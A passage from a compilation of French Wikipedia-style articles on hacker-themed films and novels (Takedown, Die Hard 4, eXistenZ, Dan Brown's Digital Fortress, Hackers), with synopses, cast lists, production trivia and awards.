Autour du film •• Ce film fut très critiqué par les proches du hacker. • Une autre version des mêmes faits est racontée dans le téléfilm The KGB, the Computer and Me (1990). • 23 est déconseillé aux enfants de moins de 12 ans en Allemagne, aux moins de 13 ans en Espagne et Argentine. Cybertraque 435 Cybertraque

Cet article est une ébauche concernant un film américain. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les conventions filmographiques.

Cybertraque[1] (Takedown) est un film américain réalisé par Joe Chappelle, sorti en 2000.

Synopsis Kevin Mitnick, est un génie de l'informatique, expert en ingénierie sociale et en piratage. Sa curiosité et son goût du défi le conduisent à se confronter à Tsutomu Shimomura, un expert mondialement reconnu de la sécurité informatique. Kevin et Tsutomu se livrent alors à une bataille d'intelligence et de ruse. Ce film est tiré de la véritable histoire de Kevin Mitnick avant qu'il ne soit arrêté.

Fiche technique • Titre original : Takedown • Titre français : Cybertraque • Réalisation : Joe Chappelle • Film américain •• Genre : policier •• Durée : 92 minutes • Dates de sortie : France : 15 mars 2000

Distribution • Skeet Ulrich : Kevin Mitnick • Russell Wong : Tsutomu Shimomura • Tom Berenger : McCoy Rollins • Angela Featherstone : Julia • Ethan Suplee : Dan Brodley • Donal Logue : Alex Lowe

Controverse Ce film est l'adaptation d'une histoire vraie et reprend les véritables noms des personnes impliquées. Cependant, bien des évènements présentés à l'écran n'ont jamais véritablement eu lieu. Par exemple : Shimomura et Mitnick ne se sont jamais rencontrés avant l'arrestation de Mitnick.

Notes et références

[1] Graphie de l'affiche : Cybertr@que.

• Portail de la sécurité informatique • Portail du cinéma américain Die Hard 4 : Retour en enfer 436 Die Hard 4 : Retour en enfer

Die Hard 4 : Retour en enfer

Les acteurs Bruce Willis et Justin Long et le réalisateur Len Wiseman sur le tournage du film, en septembre 2006

Données clés

Titre québécois Vis libre ou crève

Titre original Live Free or Die Hard

Réalisation Len Wiseman

Scénario Mark Bomback

Acteurs principaux Bruce Willis Justin Long Timothy Olyphant

Sociétés de production 20th Century Fox Cheyenne Enterprises Dune Entertainment

Pays d’origine États-Unis

Genre Action

Sortie 2007

Durée 129 minutes

Pour plus de détails, voir Fiche technique et Distribution Die Hard 4 : Retour en enfer ou Vis libre ou crève au Québec (Live Free or Die Hard[1]) est un film d'action américain réalisé par Len Wiseman, sorti le 4 juillet 2007. C'est le quatrième volet de la saga Die Hard. Die Hard 4 : Retour en enfer 437

Synopsis Des Hackers s'attaquent aux différentes infrastructures des États-Unis dans le but d'entamer une liquidation des biens américains. L'attaque débute par la coupure des communications et le piratage du système informatique du FBI. Les cybercriminels s'en prennent ensuite aux marchés boursiers, et pour finir, ils sabotent les installations électriques et de gaz. Mais ces attaques terroristes ne sont en réalité qu'un leurre, destiné à masquer les véritables intentions des crackers (ce qui n'est pas sans rappeler l'intrigue du précédent volet de la saga). Malheureusement pour eux, leur plan savamment orchestré sera chamboulé par l'intervention impromptue du lieutenant de police John McClane, escorté cette fois de Matt Farrell, le jeune hacker (et cryptographe) qu'il a été chargé d'arrêter...

Fiche technique • Titre original : Live Free or Die Hard (Die Hard 4.0 pour la distribution internationale) • Titre français : Die Hard 4 : Retour en enfer • Titre québécois : Vis libre ou crève • Réalisation : Len Wiseman • Scénario : Mark Bomback et Roderick Thorp (collaboration), d'après l'œuvre de John Carlin et sur une idée de Mark Bomback et de David Marconi • Musique : Marco Beltrami • Direction artistique : Beat Frutiger, Troy Sizemore • Décorateur de plateau : Robert Gould • Décors : Patrick Tatopoulos • Costumes : Denise Wingate • Photographie : Simon Duggan • Montage : Nicolas De Toth •• Producteurs : • Arnold Rifkin, Bruce Willis, John McTiernan, Michael Fottrell • Stephen J. Eads (co-producteur) • William Wisher Jr., Arnold Rifkin (exécutif) • Sociétés de production : 20th Century Fox, Cheyenne Enterprises, Dune Entertainment •• Distribution : • Twentieth Century Fox Film Corp • Twentieth Century Fox France • Budget : 110 000 000 $[] • Pays d'origine : États-Unis • Langue originale : anglais • Genre : action •• Durée : 129 minutes •• Dates de sortie : • 12 juin 2007, première à Tokyo • 22 juin 2007, première à New York • 27 juin 2007 • 11 juillet 2007 Die Hard 4 : Retour en enfer 438

Distribution

• Bruce Willis (VF : Patrick Poivey) : John McClane • Justin Long (VF : Patrick Mancini) : Matt Farrell • Timothy Olyphant (VF : Jean-Pierre Michaël) : Thomas Gabriel • Cliff Curtis (VF : Joël Zaffarano) : Bowman • Maggie Q (VF : Yumi Fujimori) : Mai Lihn • Mary Elizabeth Winstead (VF : Alexandra Garijo) : Lucy McClane • Jonathan Sadowski (VF : Éric Herson-Macarel) : Trey • Kevin Smith (VF : Sylvain Lemarie) : Frederick "Sorcier" Kaludis (The Warlock en V.O.) • Cyril Raffaelli (VF : Cyril Raffaelli) : Rand • Yancey Arias (VF : ?) : Agent Johnson • Allen Maldonado (VF : ?) : Barbiche • Yorgo Constantine (VF : ?) : Russo • Chris O'Brocki (VF : ?) : Civil furieux • Chris Palermo (VF : ?) : Del • Tim Russ (VF : Thierry Desroses) : Agent Chuck Summer • Jack Van Landingham (VF : ?) : Membre du S.W.A.T. • Andrew Friedman (VF : ?) : Casper • Sung Kang (VF : ?) : Raj • Zeljko Ivanek (VF : Daniel Lafourcade) : Molina • Christina Chang (VF : ?) : Taylor • Jake McDorman (VF : ?) : Jim • Rosemary Knower (VF : ?) : Mme Kaludis • Gerald Downey (VF : ?) : Agent Hoover • Jim Cantafio (VF : ?) : Propriétaire du restaurant • Chris Ellis (VF : ?) : Scalvino • Regina McKee Redwing (VF : ?) : Agent tout proche • Tony Colitti (VF : ?) : Agent chef Hazmat • Tim deZarn (VF : ?) : Sergent de police • Kurt David Anderson (VF : ?) : Miller • Matt O'Leary (VF : ?) : Clay • Nadine Ellis (VF : ?) : Teller • Ethan Flower (VF : ?) : Le trader • Nick Jaine (VF : ?) : L'homme au téléphone • Joe Gerety (VF : Patrick Bethune) : Jack Parry • David Walrod (VF : ?) : Client du restaurant • Edoardo Costa (VF : ?) : Emerson • John Reha (VF : ?) : Gamin fainéant • Rick Cramer (VF : ?) : Rodriguez • Vito Pietanza (VF : ?) : Inspecteur • Dennis Depew (VF : ?) : Inspecteur • Howard Tyrone Ferguson (VF : ?) : Inspecteur • Diana Gettinger (VF : ?) : Dispatcher FBI • Melissa Knowles (VF : ?) : Journaliste sur l'autoroute [2] • Len Wiseman : le pilote du F35 (caméo) Die Hard 4 : Retour en enfer 439

Production Cette section est vide, insuffisamment détaillée ou incomplète. Votre aide [3] est la bienvenue !

Développement À la fin des années 1990, un projet de scénario d'un éventuel Die Hard 4 sous le titre provisoire Man Of War. John McClane se retrouve embarqué dans la jungle amazonienne avec des collègues policiers et des soldats. Mais l'idée fut abandonnée lors de l'avènement du projet d'Antoine Fuqua, Les Larmes du Soleil, dans lequel Bruce Willis est un militaire américain au Nigeria[4]. Le réalisateur français Florent Emilio Siri, avec lequel Bruce Willis avait tourné Otage, avait été un temps pressenti pour la réalisation du film[2]. Bien qu'impliqué depuis le début du projet, Bruce Willis a été convaincu après le choix de Len Wiseman à la réalisation : « en voyant le thriller de Len, Underworld 2 : Évolution, j'avais été impressionné par la singularité de sa vision. Je suis complètement entré dans son film, j'ai littéralement été entraîné dedans. Le film ne se perdait jamais, c'était maîtrisé de bout en bout. Je sentais que Len pourrait apporter énormément à un nouveau Die Hard »[2].

Casting Alors que le scénario n'est pas finalisé, les rôles des deux enfants de John McLane apparaissent dans l'histoire. Justin Timberlake et Jessica Simpson étaient envisagés pour être respectivement John « Jack » McLane Junior et Lucy McLane[2]. Finalement, le fils n'apparait pas dans ce film et le rôle féminin est tenu par Mary Elizabeth Winstead. Britney Spears a également auditionné pour le rôle[5]. Scott Speedman était le premier choix de Len Wiseman pour le rôle de Matt Farrell. Quant à Bruce Willis, il voulait Ben Affleck[2]. Alors que Kal Pen et Brad Renfro ont passé des auditions, Justin Long est finalement engagé. Pour le rôle des méchants, Thomas Gabriel et son sbire Rand, Jeffrey Wright et Tony Jaa ont été respectivement pressentis pour les rôles[2]. Thomas Gabriel est finalement incarné par Timothy Olyphant, alors que l'acteur-cascadeur français Cyril Raffaelli interprète Rand.

Tournage Le tournage a débute le 30 septembre 2006[2]. Le mercredi 24 janvier 2007 à Los Angeles, Bruce Willis a reçu un coup à la tête alors qu'il tournait une des scènes de combat du film. L'acteur s'en est apparemment sorti avec une entaille au-dessus de l'œil droit. Il était de nouveau au travail dès le lendemain matin[2].

Box-office

[6] Pays Box-office Nbre de sem. Classement TLT Date

Mondial 383 277 179 USD - 101e au total

[7] États-Unis / Canada 134 529 403 USD - 205e au total

[7] 2 252 199 entrées 9 sem. e au 04/09/07 France 15 (2007)

[8] 258 455 entrées - e au total Suisse 183 Die Hard 4 : Retour en enfer 440

Commentaires

Autour du film

Les sections « Anecdotes », « Autres détails », « Le saviez-vous ? », « Citations », etc., peuvent être inopportunes dans les articles. Pour améliorer cet article il convient, si ces faits présentent un intérêt encyclopédique et sont correctement sourcés, de les intégrer dans d’autres sections.

• L'avion de chasse visible dans une scène de poursuite sur l'autoroute est un Lockheed F-35 Lightning II. • Le film a été officiellement projeté[Où ?] la première fois le 4 juillet, jour anniversaire de l'indépendance des États-Unis • Pour la première fois John McLane utilise une arme différente de celle qu'il possède dans les précédents volets. Si dans les trois autres films on pouvait le voir avec un Beretta 92F, son arme de service dans le film est un Sig-Sauer P220R de calibre .45, puis un Beretta Px4 Storm 9mm après la perte de son Sig dans la centrale électrique.

Clins d’œil • Lorsque John McClane rencontre l'agent Johnson et que ce dernier se présente, McClane répond « Johnson, encore ? ». Dans Piège de cristal, deux agents fédéraux se nommaient Johnson[2]. • Durant le générique d'entrée, lorsque le nom de Kevin Smith apparait à l'écran, le "m" de Smith disparait laissant "Sith" pendant quelques secondes. C'est un clin d’œil à Kevin Smith, grand fan de la saga Star Wars, les Sith étant les ennemis des Jedi[2]. De plus, le personnage du Sorcier, incarné par Kevin Smith, suit la vente d'une figurine de Boba Fett sur un site Internet[2].

Liquidation informatique Vente de feu est la traduction de (en) Fire Sale utilisé dans le film traduit au Québec par « Liquidation informatique ». Le terme est employé dans le film par le personnage de Matt Farell pour désigner le genre d'attaque que le pays est en train de subir. Une liquidation informatique est une attaque à l'intérieur même des systèmes informatiques du gouvernement (des États-Unis dans ce film). Cette liquidation se fait en trois étapes : 1.1.s'introduire dans le système informatique des transports du pays (feux de signalisation, panneaux routiers informatiques) 2.2.s'introduire dans les finances du pays et en extraire l'argent (marché boursier, comptes de banque, etc.) 3.3.arrêter tous les services publics utilisant l'informatique (satellites téléphoniques, radars, électricité, ressources informatiques et autres technologies utilisables par ou pour le pays) Die Hard 4 : Retour en enfer 441

Distinctions [9] Source : Internet Movie Database

Récompenses • California on Location Awards 2007 : professionnel local de l'année pour Curtis Collins • Taurus World Stunt Awards 2008 : meilleur coordinateur des cascades et/ou réalisation de la 2e équipe pour Brad Martin, Brian Smrz et John Branagan

Nominations

• Teen Choice Awards 2007 : meilleure révélation masculine pour Justin Long (également pour Admis à tout prix, La Rupture et Idiocracy) • National Movie Awards 2007 : meilleur film d'action-aventure, meilleur acteur pour Bruce Willis • Saturn Awards 2008 : meilleur film d'action, d'aventures ou thriller, meilleur acteur dans un second rôle pour Justin Long • Golden Trailer Awards 2008 : meilleure bande-annonce de film d'action • Taurus World Stunt Awards 2008 : meilleur combat, meilleure cascadeuse •• MTV Movie Awards russes 2008 : meilleur film international • Visual Effects Society Awards 2008 : meilleurs modélisation et miniatures pour la séquence du F35 et de la poursuite sur la route

Notes et références

[1] Le titre original, « Live Free or Die », est une référence à la devise nationale de l'État américain du New Hampshire.

[2] Secrets de tournage (http:/ / www. allocine. fr/ film/ fichefilm-50575/ secrets-tournage/ ) - AlloCiné

[3] http:/ / fr. wikipedia. org/ w/ index. php?title=Die_Hard_4_:_Retour_en_enfer& action=edit

[4] Dossier (Presque) tout sur Die Hard ! page 3 (http:/ / www. allocine. fr/ article/ dossiers/ cinema/ dossier-18592018/ ?page=3& tab=0) - AlloCiné

[5] Dossier (Presque) tout sur Die Hard ! page 4 (http:/ / www. allocine. fr/ article/ dossiers/ cinema/ dossier-18592018/ ?page=4& tab=0) - AlloCiné [6] Tous les temps - All Time

[7] Allociné (http:/ / www. allocine. fr/ film/ boxoffice_gen_cfilm=50575. html) consulté le 13 mars 2008

[8] ProCinema.ch (http:/ / www. procinema. ch/ db_neu/ details_f. asp?id=1269070) consulté le 13 mars 2008

[9] Awards (http:/ / www. imdb. com/ title/ tt0337978/ awards) - Internet Movie Database EXistenZ 442 EXistenZ

eXistenZ

Données clés

Titre original eXistenZ

Réalisation David Cronenberg

Scénario David Cronenberg

Acteurs principaux Jennifer Jason Leigh Jude Law Ian Holm Willem Dafoe Don McKellar

Sociétés de production Alliance Atlantis Communications Canadian Television Fund Harold Greenberg Fund TMN Serendipity Point Films (Canada) Téléfilm Canada Natural Nylon Entertainment (R.-U.) UGC (France)

Pays d’origine Canada Royaume-Uni France

Sortie 1999

Durée 97 minutes

Pour plus de détails, voir Fiche technique et Distribution eXistenZ[1] est un film de science-fiction anglo-franco-canadien[2] réalisé par David Cronenberg et sorti en 1999.

Synopsis Dans un futur proche, les joueurs de jeux vidéo sont reliés à un monde virtuel grâce à une console appelée pod, amphibien génétiquement modifié qui se connecte au système nerveux du joueur au travers d'un bioport, un trou percé à la base du dos du joueur. La démonstration du tout dernier jeu d'Allegra Geller (Jennifer Jason Leigh) tourne au cauchemar par l'intervention d'un groupe de Réalistes, fanatiques opposés à la « technologisation » de l'homme ; il ne s'agit plus de vivre une aventure, mais d'y survivre… EXistenZ 443

Fiche technique • Titre original : eXistenZ • Titre français : eXistenZ • Réalisation : David Cronenberg • Scénario : David Cronenberg • Décors : Carol Spier • Photographie : Peter Suschitzky • Montage : Ronald Sanders • Musique : Howard Shore • Production : David Cronenberg, András Hámori, Robert Lantos, Bradley Adams, Damon Bryant et Michael MacDonald • Sociétés de production : Alliance Atlantis Communications, Canadian Television Fund, Harold Greenberg Fund, TMN, Serendipity Point Films, Téléfilm Canada, Natural Nylon Entertainment, UGC • Sociétés de distribution : Alliance Atlantis (États-Unis) ; UFD (France) • Budget : 31 millions de dollars CAD (20,3 millions d'euros) • Pays d'origine : Canada, Royaume-Uni, France • Langue : anglais • Format : Couleurs - 35 mm - 1,85:1 - Son Dolby Digital • Genre : Fantastique •• Durée : 96 minutes • Dates de sortie : Allemagne : 16 février 1999 (avant-première au festival de Berlin) ; France 14 avril 1999 ; Canada / États-Unis : 23 avril 1999 ; Royaume-Uni : 30 avril 1999 ; Belgique : 19 mai 1999 • Classification : R « for strong sci-fi violence and gore, and for language » (États-Unis) ; interdit aux moins de 12 ans (France)

Distribution

• Jennifer Jason Leigh (VF : Julie Dumas) : Allegra Geller • Jude Law (VF : Ludovic Baugin) : Ted Pikul • Ian Holm (VF : Yves Barsacq) : Kiri Vinokur • Willem Dafoe (VF : Patrick Laplace) : Gas • Don McKellar : Yevgeny Nourish • Callum Keith Rennie : Hugo Carlaw • Christopher Eccleston : Levi • Sarah Polley : Merle • Robert Silvermann (VF : Gilbert Lévy) : D'Arcy Nader • Oscar Hsu (VF : Daniel Lafourcade) : le serveur du restaurant asiatique EXistenZ 444

Distinctions

Récompenses • 1999 : Ours d'argent de la contribution artistique exceptionnelle pour David Cronenberg[3] • 1999 : Silver Scream Award au Festival du film fantastique d'Amsterdam • 2000 : Prix Génie du meilleur montage

Nominations • 2000 : Saturn Award du meilleur film de science-fiction • 2000 : Chlotrudis Award du meilleur scénario • 2000 : Prix Génie du meilleur film, prix Génie de la meilleure direction artistique pour Carol Spier et Elinor Rose Galbraith

Graphie du titre Le titre du film reprend celui du jeu fictif au centre de l'intrigue. Sa graphie particulière, eXistenZ, mêlant capitales et bas-de-casse, est détaillée par un des personnages (Levi) au début du film : « eXistenZ. Written like this. One word. Small “E”, capital “X”, capital “Z”. “eXistenZ”. It's new, it's from Antenna Research, and it's here... right now. »[4]. Elle est expliquée par Mark Browning dans David Cronenberg: Author or filmmaker? : « Dans la scène d'ouverture (et de clôture) d’eXistenZ, Cronenberg démonte les traits paradoxaux du langage utilisé dans les présentations commerciales. En présentant le jeu, Levi écrit le mot eXistenZ sur un tableau noir en même temps qu'il le prononce et en insistant sur les lettres qui doivent être en majuscules[5]. ». Les lettres isten, en minuscules au milieu du mot, signifient « Dieu » en Hongrois[6]. Certains ouvrages ont adopté une graphie partiellement normalisée en rétablissant la majuscule initiale : EXistenZ[7].

Produits dérivés Une novélisation du film a été écrite par l'auteur de science-fiction Christopher Priest, spécialiste des réalités parallèles. Le film de Cronenberg est peut-être inspiré du roman de Priest Les Extrêmes, publié en 1998, qui relate la vie de Teresa Simons, agent du FBI qui découvre la trame d'évènements tragiques à travers une réalité virtuelle proche des jeux vidéo.[réf. nécessaire]

Commentaire

Cet article ou cette section peut contenir un travail inédit ou des déclarations non vérifiées. Vous pouvez aider en ajoutant des références. Voir la page de discussion pour plus de détails.

La trame du film est basée sur la confusion entre la réalité et la réalité virtuelle, que les personnages vivent hors et dans le jeu vidéo appelé eXistenZ, dont le but est tout simplement de vivre une aventure (à la manière d'un jeu d'aventure), dans un monde ultra-réaliste. Dans ce film, David Cronenberg s'amuse à donner une texture biologique aux objets technologiques : les consoles de jeu sont des sortes de fœtus, les connexions sont assurées par des cordons ombilicaux s'enfichant dans des sphincters (le thème de la symbiose entre biologie et technologie est également présent dans ses autres œuvres, comme par exemple The Naked Lunch ou Videodrome). Il joue aussi avec les codes des jeux vidéo : personnages et actions stéréotypés, des boucles d'actions qui continuent jusqu'à ce que le joueur fasse le « bon choix » pour les débloquer. EXistenZ 445

Le film est déroutant au sens où le spectateur lui-même se perd dans la mise en abyme du monde virtuel, jusqu'à la chute finale. On peut y voir une critique du cyberpunk, plus notamment d'un de ses dérivé : le biopunk, ainsi que des univers virtuels.

Notes et références

[1][1]Selon la graphie voulue par l'auteur. Cf. #Graphie du titre

[2] Allociné (http:/ / www. allocine. fr/ film/ fichefilm_gen_cfilm=9450. html)

[3] eXistenZ (1999) - Awards (http:/ / akas. imdb. com/ title/ tt0120907/ awards) sur IMDb. [4] « eXistenZ. Écrit comme ça. Un seul mot. Petit “e”, “X” majuscule, “Z” majuscule. eXistenZ. C'est nouveau, ça vient d'Antenna Resarch et c'est ici... et maintenant. » [5] Mark Browning, David Cronenberg: Author or filmmaker?, p. 170. [6][6]Deux des producteurs, András Hámori et Robert Lantos, sont originaires de Hongrie. [7] Alain Rey (dir.), « Cronenberg (David) » dans Le Petit Robert des noms propres, édité en 2011

Forteresse digitale

Forteresse digitale (Digital Fortress en anglais) est le premier roman de Dan Brown, publié aux États-Unis en 1998. Il est sorti en France en 2006, et s'est vendu à 204 100 exemplaires en 2007[1]. La traduction littérale de Digital Fortress est Forteresse numérique, malgré le titre donné à la version francophone du livre.

Personnages • Susan Fletcher, Chef du service de cryptologie à la NSA. Fiancée à David Becker. • David Becker, Directeur du département des langues modernes de l'université de Georgetown. Fiancé à Susan Fletcher. • Commandant Trevor Strathmore, Directeur adjoint des opérations à la NSA. • Ensei Tankado, Ancien employé japonais et infirme de la NSA au service Cryptologie, il est le créateur de Forteresse Digitale. • Phil Chartrukian, employé de la Sys-Sec (System Security) au service Crypto de la NSA. • Leland Fontaine, Directeur de la NSA. • Greg Hale, Cryptologue de la NSA. • Chad Brinkerhoff, Secrétaire particulier du directeur de la NSA. • Midge Milken, Chargée de la sécurité interne auprès du Directeur de la NSA. • Jabba, Chef de la Sys-Sec. • Soshi Kuta, Technicienne en chef de la Sys-Sec. • North Dakota, Pseudonyme qu'emploie Ensei Tankado pour faire croire Strathmore en l'existence de Forteresse Digitale. • L'homme aux lunettes cerclées de fer / Hulohot, Tueur à gage. • Tokugen Numataka, PDG de Numatech Corp. • Pierre Cloucharde, journaliste québécois. • Roldán, employé d'Escortes Belén. • Manuel, employé de l'Hotel Alfonso XIII. • Rocío Eva Granada, Escorte de l'agence Escortes Belén. • Hans Huber, Touriste allemand. • Deux-Tons, Adolescent punk. • Megan, Adolescente américaine. • John, garde du service de cryptologie Forteresse digitale 446

Résumé Susan Fletcher, qui est à la tête de la division Cryptologie de la NSA (National Security Agency), se trouve face à un problème sans précédent. Le superordinateur TRANSLTR (comprendre TRANSLATOR) à deux milliards de dollars et trois millions de microprocesseurs utilisé par la NSA pour casser tous les codes qui chiffrent les communications mondiales (courriels, etc.) se trouve devant une impasse lorsqu'un ancien cryptologue de la NSA, Ensei Tankado dévoile l'existence d'un nouvel algorithme. Alors qu’il faut habituellement quelques minutes pour qu’un fichier soit déchiffré, ce superordinateur recherche toujours la solution après déjà 15 heures, ce qui ne peut être expliqué que par l’existence d’un code incassable, la Forteresse Digitale. Tandis que son fiancé David Becker est envoyé en Espagne pour "Un simple aller-retour" par le Commandant Trevor Strathmore, Susan est appelée à la rescousse par ce dernier afin de trouver la raison du problème. Rapidement, Susan comprend qu'un code incassable existe, et a été créé par Ensei Tankado. Celui-ci compte le vendre aux enchères si Strathmore ne révèle pas au monde entier l'existence de TRANSLTR. Ainsi se créent en parallèle deux intrigues : d'un côté celle de David qui, difficilement, cherche à récupérer une bague en or appartenant à Tankado, mort depuis, et susceptible de renfermer la clé ; de l'autre celle de Susan qui recherche comment casser le code, comment l'exploiter et comment empêcher la divulgation du code qui rendrait la NSA impuissante. Puis, cette dernière apprend que Greg Hale est le complice de Tankado. Mais lorsqu'elle essaie de prévenir son supérieur, un informaticien découvre un virus sur le superordinateur, et coupe le courant afin d'éviter que celui-ci ne se retrouve dans la base de données top-secrète de la NSA. Mais il échoue, mis KO par Hale et tué par erreur par Strathmore. Hélas, Hale commet l'erreur de couper le courant, et le circuit auxiliaire ne se met en place que pour l'ordinateur et non pour les lumières. La suite de l'intrigue se passe dans le noir : l'héroïne apprend de son chef son projet d'insérer une "porte secrète" à l'algorithme et fait tout pour l'aider. Soudain, une alarme se fait entendre : l'ordinateur est en surchauffe. Strathmore essaie donc de couper l'ordinateur. Mais celui-ci refuse : il est infecté par un virus informatique. Il devient donc nécessaire de couper le courant, ce qui est fait. Mais l'ordinateur prend feu et explose, tuant le Commandant. C'est alors que Susan réussit à s'en sortir et être récupérée par M. Fontaine, Directeur des Opérations de la NSA. Pendant ce temps, David n'a pas chômé. Après avoir récupéré la bague, il est poursuivi par un tueur. Il réussit à s'en débarrasser et être "pris en charge" par des hommes de la NSA. Commence alors une course contre la montre : le code de Forteresse Digitale introduit par Strathmore était un virus, et celui-ci a contourné l'antivirus. Le but de ce virus est simple : détruire les barrières de protections de serveurs de la NSA afin de rendre les données top-secrètes accessibles à tous les PC du monde. Une seule parade existe : un mot de passe que Tankado devait donner à la NSA lorsque celle-ci aurait révélé l'existence de TRANSLTR. Or, la mort de Tankado oblige à, au choix : couper la base de données, un désastre pour toutes le autorités y étant connectées; ou à trouver la clé. Hélas, le code écrit sur la bague n'est pas le bon, et à l'entrée de celui-ci, le virus accélère encore : dix minutes plus tard, la base de données ne serait plus sécurisée. Seul un indice permet aux personnages de trouver le seul moyen de se sortir du piège : une entrée numérique. DCRL ELON IEEE SESA FPEM PSHG FRNE ODIA EETN NEMS RMRT SHAA EIES AIEK NEER BRTI est la solution mais il faut utiliser la méthode du carré de César ci-dessous. 3 en est le résultat des six minutes d'efforts de toute l'équipe, la différence entre l'uranium 235 de Hiroshima et l'uranium 238 de Nagasaki. Le livre se termine par le faux refus de la demande en mariage de David à Susan et par l'enterrement d'Ensei Tankado. Forteresse digitale 447

Intrigue Comme dans le cas de ses autres livres, Dan Brown nous emmène dans un univers mélangeant réalité et fiction. Ce roman emmènera le lecteur tour à tour aux États-Unis, en Espagne, au Japon, à la recherche de la solution. L'histoire romaine et la langue latine jouent aussi un rôle important dans les tentatives de déchiffrement des codes.

Code à déchiffrer La fin du roman laisse apparaître après l'épilogue une ligne en code. Dans la version française, cette ligne est la suivante: 113-19-5-28-5-53-66-113-76-19-128-10-92-15-19-128 Pour déchiffrer ce code, il faut avoir le roman à portée de main et prendre la première lettre de chacun des chapitres dont les numéros sont indiqués dans cette série.(il y a bien 128 chapitres, et le nombre 128 est là pour aider à trouver la relation) On obtient alors :

VEOROTBVUESESSES

Pour déchiffrer cette série de lettres obtenue, il faut écrire cette série de lettres en carré (Les 16 lettres donnent un carré de 4 lettres de côté) : il faut écrire en colonne. Cela est le carré de César (nom donné dans le livre), type de cryptographie utilisée au temps de l’Empire Romain pour crypter les messages. Les lettres deviennent alors : V O U S E T E S O B S E R V E S

En lisant en ligne, on voit : VOUSETESOBSERVES

En ajoutant les espaces aux bons endroits, on obtient : "Vous êtes observés"

Une référence aux systèmes de surveillance de la NSA et à « Big Brother is Watching You »

Notes et références Hackers 448 Hackers

Pour les articles homonymes, voir Hacker. Hackers

Données clés

Réalisation Iain Softley

Scénario Rafael Moreu

Acteurs principaux Jonny Lee Miller Angelina Jolie

Sociétés de production United Artists

Pays d’origine États-Unis

Genre Thriller

Sortie 1995

Durée 107 minutes

Pour plus de détails, voir Fiche technique et Distribution Hackers est un film américain réalisé par Iain Softley, sorti en 1995. Connu aussi sous les titres francophone de : Hackers - Les pirates du cyberespace (titre DVD et UMD) et Pirates (titre TV).

Synopsis Ils peuvent forcer n'importe quel code et pénétrer dans n'importe quel système. Ils sont souvent encore adolescents et déjà mis sous surveillance par les autorités. Ce sont des hackers. Zero cool - de son vrai nom Dade Murphy - est une légende parmi ses pairs. En 1988, il a, à lui tout seul, cassé 1 507 ordinateurs de Wall Street et la justice lui a interdit de s'approcher d'un clavier avant d'avoir 18 ans. Il est resté sept ans sans le moindre byte... et il a faim. Kate Libby, autrement dit Acid Burn, a un ordinateur portable gonflé, qui peut passer de 0 à 60 sur l'autoroute de l'information en une nanoseconde. Lorsqu'ils entrent en collision, la guerre des sexes prend un tour particulièrement grave. Mais il devient impossible de dire ce qui va se passer lorsque le maître hacker La Plaie utilise Dade, Kate et leurs amis dans une diabolique conspiration industrielle. Maintenant eux seuls peuvent éviter une catastrophe... comme le monde n'en a jamais vu.

Fiche technique •• Titre : Hackers(Les Pirates Du Cyberespace) •• Titre original : Hackers • Réalisation : Iain Softley • Scénario : Rafael Moreu • Production : Iain Softley, Janet Graham, Michael Peyser et Ralph Winter • Musique : Simon Boswell • Photographie : Andrzej Sekula • Montage : Christopher Blunden et Martin Walsh • Décors : John Beard • Costumes : Roger Burton • Pays d'origine : États-Unis Hackers 449

• Langue : anglais • Format : Couleur - 2,35:1 - Dts (Dolby Digital 5.1 pour le Dvd et Dolby Digital Stereo pour l'Umd) - 35 mm • Genre : Thriller •• Durée : 1h 48 environ • Date de sortie : 1995

Distribution • Jonny Lee Miller : Dade Murphy / Crash Override / Zero Cool • Angelina Jolie : Kate Libby / Acid Burn • Jesse Bradford : Joey Pardella • Matthew Lillard : Emmanuel Goldstein / Cereal Killer • Laurence Mason : Paul Cook / Lord Nikon • Renoly Santiago : Ramon Sanchez / Phantom Phreak • Fisher Stevens : Eugene Belford / La Peste / Mr Babbage • Alberta Watson : Lauren Murphy • Darren Lee : Rasoir • Peter Y. Kim : Blaireau • Ethan Browne : Curtis • Lorraine Bracco : Margo • Wendell Pierce : l'agent Richard Gill • Michael Gaston : l'agent Bob • Marc Anthony : l'agent Ray

Autour du film • Le tournage s'est déroulé à Hackensack, Londres et New York. Les scènes du lycée furent tournées à la Stuyvesant High School, un établissement spécialisé dans les disciplines des mathématiques et des sciences. • L'ordinateur central fictif que les étudiants piratent s'appelle Gibson, en hommage à l'auteur de science-fiction William Gibson. • Le nom du personnage Emmanuel Goldstein est une référence au traître du roman 1984 de George Orwell. Ce nom fut également utilisé comme pseudonyme par Eric Gordon Corley en tant qu'éditeur du magazine américain 2600: The Hacker Quarterly, et qui était également consultant sur le film. • Le Manifeste du hacker lu par l'agent Bob a été écrit en janvier 1986 par The Mentor et a été publié dans le Volume 1, Numéro 7, Phile 3 de 10 du magazine Phrack. • Vers la fin du film, le personnage Eugene Belford utilise le pseudonyme Mr Babbage, en référence à Charles Babbage, un mathématicien britannique et précurseur de l'informatique. •• Les acteurs Jonny Lee Miller et Angelina Jolie se sont mariés en mars 1996, peu après la fin du tournage. • Alors en cours de développement et avant que celui-ci ne soit porté sur la console PlayStation, lors d'une scène on peut voir le jeu vidéo WipEout tourner sur une station SGI. • Le rôle de Kate Libby avait tout d'abord été proposé à l'actrice Katherine Heigl, mais cette dernière, déjà engagée sur Piège à grande vitesse (1995), dut le refuser. Avant de finalement confier le rôle à Angelina Jolie, le réalisateur avait auditionné Hilary Swank, Heather Graham et Liv Tyler. Hackers 450

Bande originale • Original Bedroom Rockers, interprété par Kruder & Dorfmeister • Cowgirl, interprété par Underworld • Voodoo People, interprété par The Prodigy • Open Up, interprété par Leftfield • Phoebus Apollo, interprété par Carl Cox • The Joker, interprété par Josh G. Abrahams • Halcyon & On & On, interprété par Orbital • Communicate (Headquake Hazy Cloud Mix), interprété par Plastico • One Love, interprété par The Prodigy • Connected, interprété par Stereo MC's • Eyes, Lips, Body (Mekon Vocal Mix), interprété par Ramshackle • Good Grief, interprété par Urban Dance Squad • Richest Junkie Still Alive (Sank Remix), interprété par Machines of Loving Grace • Heaven Knows, interprété par Squeeze • Protection, interprété par Massive Attack • Real Wild Child, composé par Johnny O'Keefe, Johnny Greenman et Dave Owens • Original, interprété par Leftfield • Grand Central Station, composé par Guy Pratt

Dvd •• Le dvd du film est sorti le 30 novembre 1999 et est édité par Metro Goldwin Mayer. Les bonus sont composés d'une brochure de 8 pages contenant des anecdotes et des notes de productions, de la bande annonce originale et des écrans de menu interactif avec sélection de 32 scènes. La phrase d'accroche du dvd est: Vous pensiez que vos secrets étaient à l'abri. Vous vous trompiez.

Umd •• L'umd du film, édité par Metro Goldwin Mayer, est sorti le 8 mars 2006. Les Experts 451 Les Experts

